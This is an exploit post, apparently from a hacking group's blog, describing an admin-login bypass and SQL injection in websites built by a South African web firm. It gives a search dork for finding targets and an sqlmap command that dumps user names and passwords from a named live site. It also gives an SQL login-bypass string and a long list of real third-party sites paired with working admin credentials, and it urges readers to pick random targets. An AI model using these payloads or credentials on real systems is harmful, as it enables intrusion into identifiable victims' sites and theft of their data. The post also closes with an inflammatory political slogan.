IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by IIS Group"
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 20.12.2017
# Vendor Home: http://www.iisgroup.co.za/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup ################################################################################# Tutorial :

[+] Dorking İn Google Or Other Search Enggine
[+] Open Target [+] /admin/
[+] /admin/login.asp
[+] Sql GET parameter 'cat' is vulnerable
Video: https://youtu.be/YhGVu5wTtrQ 

Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump

 Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=35 AND 8346=8346

Demo: Sql:
http://www.deville.co.za/products.asp?cat=35'===> admin dv147
http://www.adval.co.za/online.asp?controller=news&view=all&id=1'
http://www.iisgroup.co.za/admin/login.asp?error=1' ===>
http://www.mactool.co.za/admin/login.asp ===> '=''or'
http://superfloral.info/admin/login.asp ===> '=''OR'

Username: admin
Password: admin

Username: '=''or'
Password: '=''or'

http://absolutecars.co.za/admin/online.asp ===> admin admin
http://www.thehosevan.co.za/admin/online.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
 http://www.burma.co.za/cms/index.php ===> admin admin
http://farsa.biz/admin/login.asp ===> admin admin
http://fundisa-academy.com/admin/online.asp ===> admin admin
http://efpglobal.com/admin/online.asp ===> admin admin
http://biscuitmanufacturers.co.za/admin/login.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
http://www.360businessparks.com/admin/online.asp ===> admin admin http://www.360storagesolutions.co.za/admin/online.asp ===> admin admin http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target

FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!
Previous
Next Post »
0 Komentar